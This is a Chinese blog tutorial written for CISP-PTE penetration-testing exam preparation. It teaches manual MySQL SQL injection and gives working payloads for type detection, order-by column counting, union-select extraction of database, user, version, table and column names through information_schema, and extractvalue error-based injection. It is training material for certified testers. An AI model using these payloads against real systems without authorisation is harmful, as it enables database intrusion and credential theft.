CISP-PTE SQL注入 入门篇

已于 2022-04-14 12:38:35 修改
阅读量1.3k 收藏 5
点赞数 2
分类专栏: CISP-PTE实战模拟 文章标签: sql 数据库
于 2021-12-21 17:32:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beirry/article/details/122054922
版权

经过上一篇的文章,相信大家也初步掌握了sql语句,现在我们就来学习SQL注入的攻击语句。

mysql在版本5之前,只能通过盲注来获取数据,mysql在版本5以后,可以获取信息的方式就很多了,因为含有默认的库:information_schema,这个库存储着mysql的结构信息。我们通过这个库来获取数据表名,字段名。

判断查询类型

select * from users where id=1

这个语句意思是查询users表中id为1的所有字段,当我把这个id的字段挖空,让这个字段可以用户自己输入。那么攻击者如果想要sql注入,就会在这个字段做操作。
所以就有了第一阶段:判断查询类型

数字类型
顾名思义就是程序员给出的字段名是否是数字类型(int)类型,可以通过与或来判断
and判断

select * from users where id=1 and 0# //用and来判断,and左边值是为真,右边的值不为真时会报错。

or判断

select * from users where id=0 or 1# //用or来判断,or左边值是为假,右边的值为真时则不会报错。

用一句话来概括,and左右两边的值为真时则为真,or左右两边任意一值为真则为真。
大家应该都注意到在输入的语句后面都有“#”,“#”的意思是注释,放在这里是将后面的语句注释掉。

字符类型
程序员给出的字段名是否是字符类型(char)类型,可以通过单引号’和双引号“来判断。

select * from users where id='1'#' //注释将原本的单引号给注释掉了,这句sql语句能正常显示

select * from users where id="1"#" //注释将原本的双引号给注释掉了,这句sql语句能正常显示

通过上面几种方法,我们基本上可以确定数据类型是什么了。

判断显示位

判断显示位,就是看返回到页面的数据是多少个字段,我们通常用order by来判断,order by 后面接的是数字,一般从1开始递增,假设显示位为3,order by 4就会报错,所以能判断出来显示位为3。

select * from users where id="1" order by 1#"

查看显示位

查看显示位,就是看返回到页面的数据在哪里展现,用union select来输出,比如显示位为3。

select * from users where id="1" union select 1,2,3#"

然后页面就会显示1 2 3这几个数字。

查库,当前用户,版本信息

查库:database()
当前用户:current_user()
版本信息:@@version

select * from users where id="1" union select database(),current_user,@@version#"

通过查库,获取当前用户,版本信息,我们可以对数据库有一个了解

查表

查表和查字段名的操作都是依附于information_schema这个结构库来查询
在这里插入图片描述

select * from users where id="1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#" //将查到的表名以一行的形式显示出来

information_schema是数据库名,tables是表名,table_schema,table_name都是字段名

查字段名

在这里插入图片描述

select * from users where id="1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name="xxx"#" //将查到的字段名以一行的形式显示出来

information_schema是数据库名,columns是表名,table_name,column_name都是字段名,xxx代表数据表名

获取数据

select * from xxx //获取数据表中所有字段

select user,password from xxx //获取数据表中字段名为user和password的字段

以上就是联合查询的sql注入手法,也有报错注入,盲注的手法

报错注入

and extractvalue(1,concat(‘~’,([sql注入语句])))#

and extractvalue(1,concat('~',(database())))# //查库

and extractvalue(1,concat('~',((select table_name from information_schema.tables where table_schema=database() limit i.n))))# //查表

and extractvalue(1,concat('~',((select column_name from information_schema.columns where table_name='xxx' limit i,n))))# //查列名

如果显示不出来可以用limit来逐一显示,在语句后面加入limit i,n i代表查询结果的索引值(默认从0开始)如果i=0时可以忽略,4;n代表查询结果返回的条数。

beirry
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CISP-PTE实操练习题讲解一(新版)
lza20001103的博客
08-05 1万+
CISP-PTE实操练习题讲解一(新版)
cisp-pte考试环境下载-原题 题库
04-01
注册信息安全专业人员-渗透测试方向注册考试是为了锻炼考生实际解决网络安全问题的能力,有效提升我国网络安全防御能力,促进国家企事业单位网络安全健康发展,为发现人才,选拔优秀人才而设立的技能水平注册考试。 本考试为业内首家实操型渗透测试技术水平注册考试,考试内容从多个角度出发,将客观题与实操题两者结合,来考核考生的全面能力。通过多个得分点,充分检验考生对于最新网络安全技术的掌握程度,展现考生在真实的网络环境中发现问题和解决问题的能力。确保通过考试的考生能在实际工作中独当一面。
CISP-PTESQL注入(二次注入的应用)
lza20001103的博客
07-04 2498
CISP-PTESQL注入(二次注入的应用)
CISP-PTE培训PPT讲义.zip
09-09
CISP-PTE渗透测试工程师认证培训讲义PPT: 操作系统安全 windows操作系统安全 数据库安全 Web安全基础 HTTP协议 注入漏洞 XSS漏洞 请求伪造漏洞 文件处理漏洞 访问控制漏洞 会话管理漏洞 实战练习 中间件安全-Apache 中间件安全-IIS 中间件安全-jboss 中间件安全-tomcat 中间件安全-weblogic web应用服务器安全加固
CISP-PTE靶机真题基础实训SQL注入(无法重置密码的情况一)思路详解
weixin_46249630的博客
12-05 819
CISP-PTE靶机真题基础实训之SQL注入(无法重置密码的情况一)思路详解
cisp-pte基础题目之SQL注入
weixin_53313406的博客
11-25 2869
cisp-pte基础题目之SQL注入(超详细)
SQL注入题型(手工注入+sqlmap)
我了解豹女就像农民伯伯了解大米
06-27 1214
题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 目录 题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 首先进行手工注入(用’以及and或者or来进行查看是否可以进行手工注入) 用sqlmap工具进行注入:(-u指定注入的网站链接,--tamper指定防止过滤关键字符,例如空格、union) 发现并没有要找的数据,回归题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。 首先进行手工注入(用’以及and或者or来进行查看是否可以
SQLSQL 注入攻击和预防
bandaoyu的note
04-06 689
预防SQL攻击措施 如何预防SQL注入? 这是开发人员应该思考的问题,作为测试人员,了解如何预防SQL注入,可以在发现注入攻击bug时,对bug产生原因进行定位。 1)严格检查输入变量的类型和格式 对于整数参数,加判断条件:不能为空、参数类型必须为数字 对于字符串参数,可以使用正则表达式进行过滤:如:必须为[0-9a-zA-Z]范围内的字符串 2)过滤和转义特殊字符 在user...
小白网安自学路第一篇--SQL注入
wing_bsj的博客
01-14 295
小白网安自学路第一篇–SQL注入 sql注入概念 sql注入,web应用未对用户传入数据的合法性进行判断或者过滤不严,攻击者将传入参数拼接在数据库查询的sql语句中,从而达到对数据库进行非法操作的目的。 sql注入基本原理 先来一个sql语句: select * from article where id= ('1') 这个1,即为用户传入的参数,这个参数不止是在各种表单提交处,搜索框,还有一些动态跳转页面,就像是php?page=…,这个page后面的数据有时候也是有可能需要提交到数据库中的,所以请多多
CISP-PTE练习篇(基础题目一:SQL注入
wojiaoqwe的博客
01-31 1698
本文仅当作练习记录使用。
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
推荐,注册信息安全专业人员渗透测试工程师(CISP-PTE)认证培训课件资料合集,共18份。 001-Linux操作系统安全V2.0.pptx 002-Windows操作系统安全V2.0.pptx 003-数据库安全.pptx 004-Web安全基础0 - 介绍.pptx 005...
cisp-pte注册渗透测试工程师详细资料及视频教程
07-16
cisp-pte讲义、模拟环境、视频教程、模拟练习网站源码
cisp-pte渗透测试资源下载 (考试环境+题库)
11-26
cisp-pte渗透测试资源下载 ,包括 考试环境、题目。
CISP-PTE(sql注入篇)
qq_56726035的博客
07-25 507
记录考ptesql注入练习,仅供参考哦
CISP-PTE SQL注入 进阶篇之实战模拟
beirry的博客
04-18 484
此次实战模拟的靶场为DVWA,将等级调为Medium Medium 这是由POST传值传输数据 用Hackbar来传输POST,id=2,则数据更新,说明id是我们的注入点 判断类型 输入1 and 0#,无返回值,则是数字型 判断显示位 从order by 1#输入到 order by 3#开始报错,则显示位只有2位 查看显示位 输入-1 union select 1,2#,看看1,2会出现在哪个位置 查表 输入-1 union select 1,group_concat(table_name
CISP-PTESQL注入练习题
西原一点红的博客
06-26 1313
得到 flag n1book{union_select_is_so_cool}通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。爆出有两个表 Article IS_KEY。发现回显内容被截取,结果显示不全,参考文档。sqlmap注入并执行sql-shell。题目明确提示过滤了注释符 # –sqlmap执行sql shell。发现列数为6时,回显字段2。
CISP-PTE学习总结之基础练习题(三)
千寻的博客
10-20 5347
练习题目一:SQL注入 0x01 题目要求 0x02 解答过程: 0x03 解题总结: 练习题目二:文件上传突破 0x01 题目要求: 0x02 解题过程: 0x03 解题总结: 练习题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结: 练习题目四:反序列化漏洞 0x01 题目要求: 0x02 解题过程 练习题目五:失效的访问控制 0x01 题目·要求: 0x02 解题过程: 0x03 解题总结:
PTESQL注入(一)
HkD01L的博客
11-10 618
CISP-PTE国家注册信息安全渗透测试工程师课程笔记SQL注入 、联合查询注入、二阶注入、报错注入
手撕spring框架(3)
最新发布
dzend的专栏
05-01 572
在Spring框架中,BeanPostProcessor是一个接口,它允许在Spring容器实例化bean之后和调用bean的初始化方法之前对bean进行自定义处理。BeanPostProcessor接口定义了两个方法:postProcessBeforeInitialization和postProcessAfterInitialization。通过实现这两个方法,我们可以在bean初始化前后做一些额外的操作,比如修改bean的属性值、添加额外的逻辑等。
360 cisp-pte sql 环境 下载
08-22
在360 CISP-PTE SQL环境下载方面,可以通过以下步骤完成: 首先,打开360安全卫士软件,确保已经登录账户,并且软件处于最新版本。 其次,在软件的主界面中,可以找到一个名为“工具箱”的选项,点击进入。 在工具箱中,可以看到一个名为“实战实训”的模块,点击进入。 在实战实训模块中,可以选择PTE SQL环境下载。这个PTE SQL环境是为了进行SQL注入实验和训练而准备的,可以提供一个安全的环境供用户实践SQL注入攻击和防御的技术。 点击PTE SQL环境下载后,软件会自动为您下载并安装相关的环境。 安装完成后,您可以在360安全卫士的软件菜单中找到这个PTE SQL环境,并且可以通过它进行实际的SQL注入实验和训练。 总之,通过360 CISP-PTE SQL环境下载,用户可以方便地获取一个安全的环境进行SQL注入实验和训练,以提升自己的技术水平和安全意识。希望以上回答对您有帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

beirry

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值